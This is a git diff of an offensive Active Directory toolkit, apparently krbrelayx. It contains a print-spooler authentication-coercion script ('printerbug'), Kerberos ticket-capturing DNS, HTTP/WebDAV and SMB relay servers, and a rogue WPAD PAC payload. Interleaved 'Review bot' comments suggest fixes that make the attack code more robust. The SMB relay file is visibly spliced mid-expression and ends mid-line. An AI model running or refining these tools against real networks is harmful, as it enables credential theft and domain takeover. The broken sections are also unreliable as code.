+# +# Triggers RPC call using SpoolService bug +# Credit for original POC goes to @tifkin_ +# +# Author: +# Dirk-jan Mollema (@_dirkjan) +# +#################### +import sys +import logging +import argparse +import codecs + +from impacket.examples.logger import ImpacketFormatter +from impacket import version +from impacket.dcerpc.v5 import transport, rprn +from impacket.dcerpc.v5.dtypes import NULL +import socket + +class PrinterBug(object): + KNOWN_PROTOCOLS = { + 139: {'bindstr': r'ncacn_np:%s[\pipe\spoolss]', 'set_host': True}, + 445: {'bindstr': r'ncacn_np:%s[\pipe\spoolss]', 'set_host': True}, + } + + def __init__(self, username='', password='', domain='', port=None, + hashes=None, attackerhost='', ping=True, timeout=1, + doKerberos=False, dcHost='', targetIp=None): + + self.__username = username + self.__password = password + self.__port = port + self.__domain = domain + self.__lmhash = '' + self.__nthash = '' + self.__attackerhost = attackerhost + self.__tcp_ping = ping + self.__tcp_timeout = timeout + self.__doKerberos = doKerberos + self.__dcHost = dcHost + self.__targetIp = targetIp + if hashes is not None: + self.__lmhash, self.__nthash = hashes.split(':') + + def dump(self, remote_host): + + logging.info('Attempting to trigger authentication via rprn RPC at %s', remote_host) + + stringbinding = self.KNOWN_PROTOCOLS[self.__port]['bindstr'] % remote_host + # logging.info('StringBinding %s'%stringbinding) + rpctransport = transport.DCERPCTransportFactory(stringbinding) + rpctransport.set_dport(self.__port) + + if self.KNOWN_PROTOCOLS[self.__port]['set_host']: + rpctransport.setRemoteHost(remote_host) + + if hasattr(rpctransport, 'set_credentials'): + # This method exists only for selected protocol sequences. 
+ rpctransport.set_credentials(self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash) + + if self.__doKerberos: + rpctransport.set_kerberos(True, kdcHost=self.__dcHost) + + if self.__targetIp: + rpctransport.setRemoteHost(self.__targetIp) + + try: + self.lookup(rpctransport, remote_host) + except Exception as e: + if logging.getLogger().level == logging.DEBUG: + import traceback + traceback.print_exc() + logging.critical("An unhandled exception has occured. Trying next host:") + logging.critical(str(e)) + + def ping(self, host): + # Code stolen from https://github.com/fox-it/BloodHound.py/blob/1124a1b5c6f62fa6c058f7294251c7cb223e3d66/bloodhound/ad/utils.py#L126 and slightly modified by @tacticalDevC + try: + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.settimeout(self.__tcp_timeout) + s.connect((host, self.__port)) + s.close() + return True + except KeyboardInterrupt: + raise + except: + return False + + def lookup(self, rpctransport, host): + if self.__tcp_ping and self.ping(host) is False: + logging.info("Host is offline. Skipping!") + return + + dce = rpctransport.get_dce_rpc() + dce.connect() + dce.bind(rprn.MSRPC_UUID_RPRN) + logging.info('Bind OK') + try: + resp = rprn.hRpcOpenPrinter(dce, '\\\\%s\x00' % host) + except Exception as e: + if str(e).find('Broken pipe') >= 0: + # The connection timed-out. 
Let's try to bring it back next round + logging.error('Connection failed - skipping host!') + return + elif str(e).upper().find('ACCESS_DENIED'): + # We're not admin, bye + logging.error('Access denied - RPC call was denied') + dce.disconnect() + return + else: + raise + logging.info('Got handle') + + request = rprn.RpcRemoteFindFirstPrinterChangeNotificationEx() + request['hPrinter'] = resp['pHandle'] + request['fdwFlags'] = rprn.PRINTER_CHANGE_ADD_JOB + request['pszLocalMachine'] = '\\\\%s\x00' % self.__attackerhost + request['pOptions'] = NULL + try: + resp = dce.request(request) + except Exception as e: + print(e) + logging.info('Triggered RPC backconnect, this may or may not have worked') + + dce.disconnect() + + return None + + +# Process command-line arguments. +def main(): + # Init the example's logger theme + handler = logging.StreamHandler(sys.stderr) + handler.setFormatter(ImpacketFormatter()) + logging.getLogger().addHandler(handler) + logging.getLogger().setLevel(logging.INFO) + + # Explicitly changing the stdout encoding format + if sys.stdout.encoding is None: + # Output is redirected to a file + sys.stdout = codecs.getwriter('utf8')(sys.stdout) + logging.info(version.BANNER) + + parser = argparse.ArgumentParser() + + parser.add_argument('target', action='store', help='[[domain/]username[:password]@]') + parser.add_argument('attackerhost', action='store', help='hostname to connect to') + parser.add_argument("--verbose", action="store_true", help="Switch verbosity to DEBUG") + + group = parser.add_argument_group('connection') + + group.add_argument('-target-file', + action='store', + metavar="file", + help='Use the targets in the specified file instead of the one on'\ + ' the command line (you must still specify something as target name)') + group.add_argument('-port', choices=['139', '445'], nargs='?', default='445', metavar="destination port", + help='Destination port to connect to SMB Server') + group.add_argument("-timeout", + action="store", + 
metavar="timeout", + default=1, + help="Specify a timeout for the TCP ping check") + group.add_argument("-no-ping", + action="store_false", + help="Specify if a TCP ping should be done before connection"\ + "NOT recommended since SMB timeouts default to 300 secs and the TCP ping assures connectivity to the SMB port") + + group = parser.add_argument_group('authentication') + + group.add_argument('-hashes', action="store", metavar = "LMHASH:NTHASH", help='NTLM hashes, format is LMHASH:NTHASH') + group.add_argument('-no-pass', action="store_true", help='don\'t ask for password (useful when proxying through ntlmrelayx)') + group.add_argument('-k', action="store_true", help='Use Kerberos authentication. Grabs credentials from ccache file ' + '(KRB5CCNAME) based on target parameters. If valid credentials ' + 'cannot be found, it will use the ones specified in the command ' + 'line') + group.add_argument('-dc-ip', action="store", metavar="ip address", help='IP Address of the domain controller. If omitted it will use the domain part (FQDN) specified in the target parameter') + group.add_argument('-target-ip', action='store', metavar="ip address", + help='IP Address of the target machine. If omitted it will use whatever was specified as target. 
' + 'This is useful when target is the NetBIOS name or Kerberos name and you cannot resolve it') + + if len(sys.argv)==1: + parser.print_help() + sys.exit(1) + + options = parser.parse_args() + + import re + + domain, username, password, remote_name = re.compile('(?:(?:([^/@:]*)/)?([^@:]*)(?::([^@]*))?@)?(.*)').match( + options.target).groups('') + + #In case the password contains '@' + if '@' in remote_name: + password = password + '@' + remote_name.rpartition('@')[0] + remote_name = remote_name.rpartition('@')[2] + + if options.verbose: + logging.getLogger().setLevel(logging.DEBUG) + + if domain is None: + domain = '' + + if options.dc_ip is None: + dc_ip = domain + else: + dc_ip = options.dc_ip + + if password == '' and username != '' and options.hashes is None and options.no_pass is False: + from getpass import getpass + password = getpass("Password:") + + remote_names = [] + if options.target_file is not None: + with open(options.target_file, 'r') as inf: + for line in inf: + remote_names.append(line.strip()) + else: + remote_names.append(remote_name) + + lookup = PrinterBug(username, password, domain, int(options.port), options.hashes, options.attackerhost, options.no_ping, float(options.timeout), options.k, dc_ip, options.target_ip) + for remote_name in remote_names: + + try: + lookup.dump(remote_name) + except KeyboardInterrupt: + break + + +if __name__ == '__main__': + main() diff --git a/kerbexec/krb.gitignore b/kerbexec/krb.gitignore new file mode 100644 index 0000000..51cd7a8 --- /dev/null +++ b/kerbexec/krb.gitignore @@ -0,0 +1,5 @@ +build/ +venv/ +*.egg-info +dist/ +*.pyc diff --git a/kerbexec/servers/__init__.py b/kerbexec/servers/__init__.py new file mode 100644 index 0000000..8c123a0 --- /dev/null +++ b/kerbexec/servers/__init__.py @@ -0,0 +1,3 @@ +from .httprelayserver import HTTPKrbRelayServer +from .smbrelayserver import SMBRelayServer +from .dnsrelayserver import DNSRelayServer \ No newline at end of file 
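Review bot: In `PrinterBug.lookup`, `elif str(e).upper().find('ACCESS_DENIED'):` tests the return value of `find()`, which is -1 (truthy) when the text is absent and 0 (falsy) when it is at the start, so nearly every exception from `hRpcOpenPrinter` is logged as access denied and the `else: raise` branch is effectively unreachable. A membership test states the intent: `elif 'ACCESS_DENIED' in str(e).upper():`. The "Broken pipe" branch above it also returns without calling `dce.disconnect()`, unlike the branch that follows.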
diff --git a/kerbexec/servers/dnsrelayserver.py b/kerbexec/servers/dnsrelayserver.py
new file mode 100644
index 0000000..252e3f5
--- /dev/null
+++ b/kerbexec/servers/dnsrelayserver.py
@@ -0,0 +1,108 @@ +import random, string +import socket +from struct import pack, unpack +import sys, binascii +from impacket.spnego import SPNEGO_NegTokenInit, TypesMech, SPNEGO_NegTokenResp, ASN1_OID, asn1encode, ASN1_AID +from impacket import ntlm +from impacket import dns +from socketserver import TCPServer, BaseRequestHandler, ThreadingMixIn +from impacket.structure import Structure +from dns.message import from_wire +from impacket import ntlm, LOG +from impacket.smbserver import outputToJohnFormat, writeJohnOutputToFile +from impacket.examples.ntlmrelayx.utils.targetsutils import TargetsProcessor +from lib.utils.kerberos import get_kerberos_loot, get_auth_data + +from threading import Thread + + +class DNSRelayServer(Thread): + class DNSServer(ThreadingMixIn, TCPServer): + def __init__(self, server_address, request_handler_class, config): + self.config = config + self.daemon_threads = True + if self.config.ipv6: + self.address_family = socket.AF_INET6 + self.wpad_counters = {} + try: + TCPServer.__init__(self, server_address, request_handler_class) + except OSError as e: + if "already in use" in str(e): + LOG.error('Could not start DNS server. Address is already in use. 
To fix this error, specify the interface IP to listen on with --interface-ip') + else: + LOG.error('Could not start DNS server: %s', str(e)) + raise e + + class DnsReqHandler(BaseRequestHandler): + def handle(self): + data = self.request.recv(1024) + dlen, = unpack('>H', data[:2]) + while dlen > len(data[2:]): + data += self.request.recv(1024) + dnsp = data[2:dlen+2] + LOG.info('DNS: Client sent authorization') + pckt = from_wire(dnsp) + LOG.debug(str(pckt)) + nti = None + for rd in pckt.additional[0]: + nti = rd.key + if not nti: + return + + if self.server.config.mode == 'RELAY': + authdata = get_auth_data(nti, self.server.config) + self.do_relay(authdata) + else: + # Unconstrained delegation mode + authdata = get_kerberos_loot(token, self.server.config) + self.do_attack(authdata) + + def do_relay(self, authdata): + self.authUser = '%s/%s' % (authdata['domain'], authdata['username']) + sclass, host = authdata['service'].split('/') + for target in self.server.config.target.originalTargets: + parsed_target = target + if parsed_target.hostname.lower() == host.lower(): + # Found a target with the same SPN + client = self.server.config.protocolClients[target.scheme.upper()](self.server.config, parsed_target) + client.initConnection(authdata, self.server.config.dcip) + # We have an attack.. go for it + attack = self.server.config.attacks[parsed_target.scheme.upper()] + client_thread = attack(self.server.config, client.session, self.authUser) + client_thread.start() + return + # Still here? 
Then no target was found matching this SPN + LOG.error('No target configured that matches the hostname of the SPN in the ticket: %s', parsed_target.host.lower()) + + def do_attack(self, authdata): + self.authUser = '%s/%s' % (authdata['domain'], authdata['username']) + # No SOCKS, since socks is pointless when you can just export the tickets + # instead we iterate over all the targets + for target in self.server.config.target.originalTargets: + parsed_target = target + if parsed_target.scheme.upper() in self.server.config.attacks: + client = self.server.config.protocolClients[target.scheme.upper()](self.server.config, parsed_target) + client.initConnection(authdata, self.server.config.dcip) + # We have an attack.. go for it + attack = self.server.config.attacks[parsed_target.scheme.upper()] + client_thread = attack(self.server.config, client.session, self.authUser) + client_thread.start() + else: + LOG.error('No attack configured for %s', parsed_target.scheme.upper()) + + def __init__(self, config): + Thread.__init__(self) + self.daemon = True + self.config = config + self.server = None + + def _start(self): + self.server.daemon_threads=True + self.server.serve_forever() + LOG.info('Shutting down DNS Server') + self.server.server_close() + + def run(self): + LOG.info("Setting up DNS Server") + self.server = self.DNSServer((self.config.interfaceIp, 53), self.DnsReqHandler, self.config) + self._start() \ No newline at end of file diff --git a/kerbexec/servers/httprelayserver.py b/kerbexec/servers/httprelayserver.py new file mode 100644 index 0000000..9dc454b --- /dev/null +++ b/kerbexec/servers/httprelayserver.py 
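Review bot: `DnsReqHandler.handle` trusts the peer's 2-byte length prefix without checking what `recv` returned. If fewer than two bytes arrive, `unpack('>H', data[:2])` raises, and if the peer closes early, `recv` keeps returning `b''` and the `while dlen > len(data[2:])` loop spins forever on that handler thread. The read should stop on an empty chunk, as sketched below, and a socket timeout on `self.request` would bound a stalled peer as well. The `for rd in pckt.additional[0]` line has the same problem with a message that carries no additional section (IndexError), so it needs a length check first.

```python
def handle(self):
    # Read the 2-byte length prefix, then exactly that many bytes; give up on EOF.
    data = b''
    while len(data) < 2:
        chunk = self.request.recv(1024)
        if not chunk:
            return
        data += chunk
    dlen, = unpack('>H', data[:2])
    while len(data) - 2 < dlen:
        chunk = self.request.recv(1024)
        if not chunk:
            return
        data += chunk
    dnsp = data[2:dlen+2]
    # … unchanged: from_wire parsing and mode dispatch …
```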
@@ -0,0 +1,168 @@ +try: + import SimpleHTTPServer + import SocketServer +except ImportError: + import http.server as SimpleHTTPServer + import socketserver as SocketServer +import socket +import base64 +import random +import string +import traceback +from threading import Thread +from six import PY2, b + +from impacket import ntlm, LOG +from impacket.smbserver import outputToJohnFormat, writeJohnOutputToFile +from impacket.examples.ntlmrelayx.utils.targetsutils import TargetsProcessor +from impacket.examples.ntlmrelayx.servers import HTTPRelayServer +from lib.utils.kerberos import get_kerberos_loot + +class HTTPKrbRelayServer(HTTPRelayServer): + """ + HTTP Kerberos relay server. Mostly extended from ntlmrelayx. + Only required functions are overloaded + """ + + class HTTPHandler(HTTPRelayServer.HTTPHandler): + def __init__(self,request, client_address, server): + self.server = server + self.protocol_version = 'HTTP/1.1' + self.challengeMessage = None + self.client = None + self.machineAccount = None + self.machineHashes = None + self.domainIp = None + self.authUser = None + self.wpad = 'function FindProxyForURL(url, host){if ((host == "localhost") || shExpMatch(host, "localhost.*") ||(host == "127.0.0.1")) return "DIRECT"; if (dnsDomainIs(host, "%s")) return "DIRECT"; return "PROXY %s:80; DIRECT";} ' + LOG.info("HTTPD: Received connection from %s, prompting for authentication", client_address[0]) + try: + SimpleHTTPServer.SimpleHTTPRequestHandler.__init__(self,request, client_address, server) + except Exception as e: + LOG.error(str(e)) + LOG.debug(traceback.format_exc()) + + def getheader(self, header): + try: + return self.headers.getheader(header) + except AttributeError: + return self.headers.get(header) + + def do_PROPFIND(self): + proxy = False + if (".jpg" in self.path) or (".JPG" in self.path): + content = b"""http://webdavrelay/file/image.JPG/2016-11-12T22:00:22Zimage.JPG4456image/jpeg4ebabfcee4364434dacb043986abfffeMon, 20 Mar 2017 00:00:22 GMT0HTTP/1.1 
200 OK""" + else: + content = b"""http://webdavrelay/file/2016-11-12T22:00:22ZaMon, 20 Mar 2017 00:00:22 GMT0HTTP/1.1 200 OK""" + + messageType = 0 + if PY2: + autorizationHeader = self.headers.getheader('Authorization') + else: + autorizationHeader = self.headers.get('Authorization') + if autorizationHeader is None: + self.do_AUTHHEAD(message=b'Negotiate') + return + else: + auth_header = autorizationHeader + try: + _, blob = auth_header.split('Negotiate') + token = base64.b64decode(blob.strip()) + except: + self.do_AUTHHEAD(message=b'Negotiate', proxy=proxy) + return + + if b'NTLMSSP' in token: + LOG.info('HTTPD: Client %s is using NTLM authentication instead of Kerberos' % self.client_address[0]) + return + # If you're looking for the magic, it's in lib/utils/kerberos.py + authdata = get_kerberos_loot(token, self.server.config) + + # If we are here, it was succesful + + # Are we in attack mode? If so, launch attack against all targets + if self.server.config.mode == 'ATTACK': + self.do_attack(authdata) + + self.send_response(207, "Multi-Status") + self.send_header('Content-Type', 'application/xml') + self.send_header('Content-Length', str(len(content))) + self.end_headers() + self.wfile.write(content) + + def do_GET(self): + messageType = 0 + if self.server.config.mode == 'REDIRECT': + self.do_SMBREDIRECT() + return + + LOG.info('HTTPD: Client requested path: %s' % self.path.lower()) + + # Serve WPAD if: + # - The client requests it + # - A WPAD host was provided in the command line options + # - The client has not exceeded the wpad_auth_num threshold yet + if self.path.lower() == '/wpad.dat' and self.server.config.serve_wpad and self.should_serve_wpad(self.client_address[0]): + LOG.info('HTTPD: Serving PAC file to client %s' % self.client_address[0]) + self.serve_wpad() + return + + # Determine if the user is connecting to our server directly or attempts to use it as a proxy + if self.command == 'CONNECT' or (len(self.path) > 4 and self.path[:4].lower() == 
'http'): + proxy = True + else: + proxy = False + + # TODO: Handle authentication that isn't complete the first time + + if (proxy and self.getheader('Proxy-Authorization') is None) or (not proxy and self.getheader('Authorization') is None): + self.do_AUTHHEAD(message=b'Negotiate', proxy=proxy) + return + else: + if proxy: + auth_header = self.getheader('Proxy-Authorization') + else: + auth_header = self.getheader('Authorization') + + try: + _, blob = auth_header.split('Negotiate') + token = base64.b64decode(blob.strip()) + except: + self.do_AUTHHEAD(message=b'Negotiate', proxy=proxy) + return + if b'NTLMSSP' in token: + LOG.info('HTTPD: Client %s is using NTLM authentication instead of Kerberos' % self.client_address[0]) + return + # If you're looking for the magic, it's in lib/utils/kerberos.py + authdata = get_kerberos_loot(token, self.server.config) + + # If we are here, it was succesful + + # Are we in attack mode? If so, launch attack against all targets + if self.server.config.mode == 'ATTACK': + self.do_attack(authdata) + + # And answer 404 not found + self.send_response(404) + self.send_header('WWW-Authenticate', 'Negotiate') + self.send_header('Content-type', 'text/html') + self.send_header('Content-Length','0') + self.send_header('Connection','close') + self.end_headers() + return + + def do_attack(self, authdata): + self.authUser = '%s/%s' % (authdata['domain'], authdata['username']) + # No SOCKS, since socks is pointless when you can just export the tickets + # instead we iterate over all the targets + for target in self.server.config.target.originalTargets: + parsed_target = target + if parsed_target.scheme.upper() in self.server.config.attacks: + client = self.server.config.protocolClients[target.scheme.upper()](self.server.config, parsed_target) + client.initConnection(authdata, self.server.config.dcip) + # We have an attack.. 
go for it + attack = self.server.config.attacks[parsed_target.scheme.upper()] + client_thread = attack(self.server.config, client.session, self.authUser) + client_thread.start() + else: + LOG.error('No attack configured for %s', parsed_target.scheme.upper()) diff --git a/kerbexec/servers/smbrelayserver.py b/kerbexec/servers/smbrelayserver.py new file mode 100644 index 0000000..cbd0709 --- /dev/null +++ b/kerbexec/servers/smbrelayserver.py 
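Review bot: Both `do_PROPFIND` and `do_GET` wrap the `Authorization` header parsing in a bare `except:`, which also catches `KeyboardInterrupt` and `SystemExit` and turns any unrelated bug in that block into another authentication challenge. The two failures expected there are the tuple unpack of `auth_header.split('Negotiate')` and `base64.b64decode`, so `except (TypeError, ValueError):` covers them on both Python 2 and 3. The parsing block is repeated almost line for line in the two handlers and could move into one helper, and `messageType = 0` is assigned in both but never read.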
@@ -0,0 +1,595 @@ +# Copyright (c) 2013-2016 CORE Security Technologies +# +# This software is provided under under a slightly modified version +# of the Apache Software License. See the accompanying LICENSE file +# for more information. +# +# SMB Relay Server +# +# Authors: +# Alberto Solino (@agsolino) +# Dirk-jan Mollema / Fox-IT (https://www.fox-it.com) +# +# Description: +# This is the SMB server which relays the connections +# to other protocols +from __future__ import division +from __future__ import print_function +from six import b +from threading import Thread +try: + import ConfigParser +except ImportError: + import configparser as ConfigParser +import struct +import logging +import time +import calendar +import random +import string +import socket + +from binascii import hexlify +from impacket import smb, ntlm, LOG, smb3 +from impacket.nt_errors import STATUS_MORE_PROCESSING_REQUIRED, STATUS_ACCESS_DENIED, STATUS_SUCCESS +from impacket.spnego import SPNEGO_NegTokenResp, SPNEGO_NegTokenInit +from impacket.smbserver import SMBSERVER, outputToJohnFormat, writeJohnOutputToFile +from impacket.spnego import ASN1_AID, ASN1_SUPPORTED_MECH +from impacket.examples.ntlmrelayx.servers.socksserver import activeConnections +from impacket.examples.ntlmrelayx.utils.targetsutils import TargetsProcessor +from impacket.smbserver import getFileTime +from pyasn1.codec.der import decoder, encoder +from lib.utils.kerberos import get_kerberos_loot, get_auth_data +from lib.utils.spnego import GSSAPIHeader_SPNEGO_Init2, GSSAPIHeader_SPNEGO_Init, MechTypes, MechType, TypesMech, NegTokenResp, NegResult, NegotiationToken + +class SMBRelayServer(Thread): + def __init__(self,config): + Thread.__init__(self) + self.daemon = True + self.server = 0 + #Config object + self.config = config + #Current target IP + self.target = None + #Targets handler + self.targetprocessor = self.config.target + #Username we auth as gets stored here later + self.authUser = None + self.proxyTranslator = 
None + + # Here we write a mini config for the server + smbConfig = ConfigParser.ConfigParser() + smbConfig.add_section('global') + smbConfig.set('global','server_name','server_name') + smbConfig.set('global','server_os','UNIX') + smbConfig.set('global','server_domain','WORKGROUP') + smbConfig.set('global','log_file','None') + smbConfig.set('global','credentials_file','') + + if self.config.smb2support is True: + smbConfig.set("global", "SMB2Support", "True") + else: + smbConfig.set("global", "SMB2Support", "False") + + if self.config.outputFile is not None: + smbConfig.set('global','jtr_dump_path',self.config.outputFile) + + # IPC always needed + smbConfig.add_section('IPC$') + smbConfig.set('IPC$','comment','') + smbConfig.set('IPC$','read only','yes') + smbConfig.set('IPC$','share type','3') + smbConfig.set('IPC$','path','') + + # Change address_family to IPv6 if this is configured + if self.config.ipv6: + SMBSERVER.address_family = socket.AF_INET6 + + # changed to dereference configuration interfaceIp + self.server = SMBSERVER((config.interfaceIp,445), config_parser = smbConfig) + logging.getLogger('impacket.smbserver').setLevel(logging.CRITICAL) + + self.server.processConfigFile() + + self.origSmbComNegotiate = self.server.hookSmbCommand(smb.SMB.SMB_COM_NEGOTIATE, self.SmbComNegotiate) + self.origSmbSessionSetupAndX = self.server.hookSmbCommand(smb.SMB.SMB_COM_SESSION_SETUP_ANDX, self.SmbSessionSetupAndX) + + self.origSmbNegotiate = self.server.hookSmb2Command(smb3.SMB2_NEGOTIATE, self.SmbNegotiate) + self.origSmbSessionSetup = self.server.hookSmb2Command(smb3.SMB2_SESSION_SETUP, self.SmbSessionSetup) + # Let's use the SMBServer Connection dictionary to keep track of our client connections as well + #TODO: See if this is the best way to accomplish this + + # changed to dereference configuration interfaceIp + self.server.addConnection('SMBRelay', config.interfaceIp, 445) + + ### SMBv2 Part ################################################################# + def 
SmbNegotiate(self, connId, smbServer, recvPacket, isSMB1=False): + connData = smbServer.getConnectionData(connId, checkStatus=False) + + + LOG.info("SMBD: Received connection from %s" % (connData['ClientIP'])) + + respPacket = smb3.SMB2Packet() + respPacket['Flags'] = smb3.SMB2_FLAGS_SERVER_TO_REDIR + respPacket['Status'] = STATUS_SUCCESS + respPacket['CreditRequestResponse'] = 1 + respPacket['Command'] = smb3.SMB2_NEGOTIATE + respPacket['SessionID'] = 0 + + if isSMB1 is False: + respPacket['MessageID'] = recvPacket['MessageID'] + else: + respPacket['MessageID'] = 0 + + respPacket['TreeID'] = 0 + + respSMBCommand = smb3.SMB2Negotiate_Response() + + # Just for the Nego Packet, then disable it + respSMBCommand['SecurityMode'] = smb3.SMB2_NEGOTIATE_SIGNING_ENABLED + + if isSMB1 is True: + # Let's first parse the packet to see if the client supports SMB2 + SMBCommand = smb.SMBCommand(recvPacket['Data'][0]) + + dialects = SMBCommand['Data'].split(b'\x02') + if b'SMB 2.002\x00' in dialects or b'SMB 2.???\x00' in dialects: + respSMBCommand['DialectRevision'] = smb3.SMB2_DIALECT_002 + #respSMBCommand['DialectRevision'] = smb3.SMB2_DIALECT_21 + else: + # Client does not support SMB2 fallbacking + raise Exception('Client does not support SMB2, fallbacking') + else: + respSMBCommand['DialectRevision'] = smb3.SMB2_DIALECT_002 + #respSMBCommand['DialectRevision'] = smb3.SMB2_DIALECT_21 + + respSMBCommand['ServerGuid'] = b(''.join([random.choice(string.ascii_letters) for _ in range(16)])) + respSMBCommand['Capabilities'] = 0 + respSMBCommand['MaxTransactSize'] = 65536 + respSMBCommand['MaxReadSize'] = 65536 + respSMBCommand['MaxWriteSize'] = 65536 + respSMBCommand['SystemTime'] = getFileTime(calendar.timegm(time.gmtime())) + respSMBCommand['ServerStartTime'] = getFileTime(calendar.timegm(time.gmtime())) + respSMBCommand['SecurityBufferOffset'] = 0x80 + + blob = GSSAPIHeader_SPNEGO_Init2() + blob['tokenOid'] = '1.3.6.1.5.5.2' + 
blob['innerContextToken']['mechTypes'].extend([MechType(TypesMech['KRB5 - Kerberos 5']), + MechType(TypesMech['MS KRB5 - Microsoft Kerberos 5']), + MechType(TypesMech['NTLMSSP - Microsoft NTLM Security Support Provider'])]) + blob['innerContextToken']['negHints']['hintName'] = "not_defined_in_RFC4178@please_ignore" + respSMBCommand['Buffer'] = encoder.encode(blob) + + respSMBCommand['SecurityBufferLength'] = len(respSMBCommand['Buffer']) + + respPacket['Data'] = respSMBCommand + + smbServer.setConnectionData(connId, connData) + + return None, [respPacket], STATUS_SUCCESS + + # This is SMB2 + def SmbSessionSetup(self, connId, smbServer, recvPacket): + connData = smbServer.getConnectionData(connId, checkStatus = False) + ############################################################# + # SMBRelay + smbData = smbServer.getConnectionData('SMBRelay', False) + ############################################################# + + respSMBCommand = smb3.SMB2SessionSetup_Response() + sessionSetupData = smb3.SMB2SessionSetup(recvPacket['Data']) + + connData['Capabilities'] = sessionSetupData['Capabilities'] + + securityBlob = sessionSetupData['Buffer'] + + rawNTLM = False + if struct.unpack('B',securityBlob[0:1])[0] == ASN1_AID: + + # negTokenInit packet + try: + blob = decoder.decode(securityBlob, asn1Spec=GSSAPIHeader_SPNEGO_Init())[0] + token = blob['innerContextToken']['negTokenInit']['mechToken'] + + if len(blob['innerContextToken']['negTokenInit']['mechTypes']) > 0: + # Is this GSSAPI NTLM or something else we don't support? + mechType = blob['innerContextToken']['negTokenInit']['mechTypes'][0] + if str(mechType) != TypesMech['KRB5 - Kerberos 5'] and str(mechType) != \ + TypesMech['MS KRB5 - Microsoft Kerberos 5']: + # Nope, do we know it? 
+ if str(mechType) in MechTypes: + mechStr = MechTypes[str(mechType)] + else: + mechStr = mechType + smbServer.log("Unsupported MechType '%s'" % mechStr, logging.CRITICAL) + # We don't know the token, we answer back again saying + # we just support Kerberos. + respToken = NegotiationToken() + respToken['negTokenResp']['negResult'] = 'request_mic' + respToken['negTokenResp']['supportedMech'] = TypesMech['KRB5 - Kerberos 5'] + respTokenData = encoder.encode(respToken) + respSMBCommand['SecurityBufferOffset'] = 0x48 + respSMBCommand['SecurityBufferLength'] = len(respTokenData) + respSMBCommand['Buffer'] = respTokenData + + return [respSMBCommand], None, STATUS_MORE_PROCESSING_REQUIRED + else: + + # This is Kerberos, we can do something with this + try: + # Are we in attack mode? If so, launch attack against all targets + if self.config.mode == 'ATTACK': + # If you're looking for the magic, it's in lib/utils/kerberos.py + authdata = get_kerberos_loot(securityBlob, self.config) + self.do_attack(authdata) + + if self.config.mode == 'RELAY': + authdata = get_auth_data(securityBlob, self.config) + self.do_relay(authdata) + + # This ignores all signing stuff + # causes connection resets + # Todo: reply properly! 
+ + respToken = NegotiationToken() + # accept-completed + respToken['negTokenResp']['negResult'] = 'accept_completed' + + respSMBCommand['SecurityBufferOffset'] = 0x48 + respSMBCommand['SecurityBufferLength'] = len(respToken) + respSMBCommand['Buffer'] = encoder.encode(respToken) + + smbServer.setConnectionData(connId, connData) + + return [respSMBCommand], None, STATUS_SUCCESS + + # Somehow the function above catches all exceptions and hides them + # which is pretty annoying + except Exception as e: + import traceback + traceback.print_exc() + raise + + pass + except: + import traceback + traceback.print_exc() + else: + # No GSSAPI stuff, we can't do anything with this + smbServer.log("No negTokenInit sent by client", logging.CRITICAL) + raise Exception('No negTokenInit sent by client') + + respSMBCommand['SecurityBufferOffset'] = 0x48 + respSMBCommand['SecurityBufferLength'] = len(respToken) + respSMBCommand['Buffer'] = respToken.getData() + + smbServer.setConnectionData(connId, connData) + + return [respSMBCommand], None, errorCode + ################################################################################ + + ### SMBv1 Part ################################################################# + def SmbComNegotiate(self, connId, smbServer, SMBCommand, recvPacket): + connData = smbServer.getConnectionData(connId, checkStatus = False) + if self.config.mode.upper() == 'REFLECTION': + self.targetprocessor = TargetsProcessor(singleTarget='SMB://%s:445/' % connData['ClientIP']) + + #TODO: Check if a cache is better because there is no way to know which target was selected for this victim + # except for relying on the targetprocessor selecting the same target unless a relay was already done + self.target = self.targetprocessor.getTarget() + + ############################################################# + # SMBRelay + # Get the data for all connections + smbData = smbServer.getConnectionData('SMBRelay', False) + + if smbData.has_key(self.target): + # Remove the 
previous connection and use the last one + smbClient = smbData[self.target]['SMBClient'] + del smbClient + del smbData[self.target] + + LOG.info("SMBD: Received connection from %s, attacking target %s://%s" % (connData['ClientIP'], self.target.scheme, self.target.netloc)) + + try: + if recvPacket['Flags2'] & smb.SMB.FLAGS2_EXTENDED_SECURITY == 0: + extSec = False + else: + if self.config.mode.upper() == 'REFLECTION': + # Force standard security when doing reflection + LOG.debug("Downgrading to standard security") + extSec = False + recvPacket['Flags2'] += (~smb.SMB.FLAGS2_EXTENDED_SECURITY) + else: + extSec = True + + #Init the correct client for our target + client = self.init_client(extSec) + except Exception as e: + LOG.error("Connection against target %s://%s FAILED: %s" % (self.target.scheme, self.target.netloc, str(e))) + self.targetprocessor.logTarget(self.target) + else: + smbData[self.target] = {} + smbData[self.target]['SMBClient'] = client + connData['EncryptionKey'] = client.getStandardSecurityChallenge() + smbServer.setConnectionData('SMBRelay', smbData) + smbServer.setConnectionData(connId, connData) + + return self.origSmbComNegotiate(connId, smbServer, SMBCommand, recvPacket) + ############################################################# + + def SmbSessionSetupAndX(self, connId, smbServer, SMBCommand, recvPacket): + + connData = smbServer.getConnectionData(connId, checkStatus = False) + ############################################################# + # SMBRelay + smbData = smbServer.getConnectionData('SMBRelay', False) + ############################################################# + + respSMBCommand = smb.SMBCommand(smb.SMB.SMB_COM_SESSION_SETUP_ANDX) + + if connData['_dialects_parameters']['Capabilities'] & smb.SMB.CAP_EXTENDED_SECURITY: + # Extended security. 
Here we deal with all SPNEGO stuff + respParameters = smb.SMBSessionSetupAndX_Extended_Response_Parameters() + respData = smb.SMBSessionSetupAndX_Extended_Response_Data() + sessionSetupParameters = smb.SMBSessionSetupAndX_Extended_Parameters(SMBCommand['Parameters']) + sessionSetupData = smb.SMBSessionSetupAndX_Extended_Data() + sessionSetupData['SecurityBlobLength'] = sessionSetupParameters['SecurityBlobLength'] + sessionSetupData.fromString(SMBCommand['Data']) + connData['Capabilities'] = sessionSetupParameters['Capabilities'] + + if struct.unpack('B',sessionSetupData['SecurityBlob'][0])[0] != ASN1_AID: + # If there no GSSAPI ID, it must be an AUTH packet + blob = SPNEGO_NegTokenResp(sessionSetupData['SecurityBlob']) + token = blob['ResponseToken'] + else: + # NEGOTIATE packet + blob = SPNEGO_NegTokenInit(sessionSetupData['SecurityBlob']) + token = blob['MechToken'] + + # Here we only handle NTLMSSP, depending on what stage of the + # authentication we are, we act on it + messageType = struct.unpack('> 16 + packet['ErrorClass'] = errorCode & 0xff + + LOG.error("Authenticating against %s://%s as %s\%s FAILED" % ( + self.target.scheme, self.target.netloc, 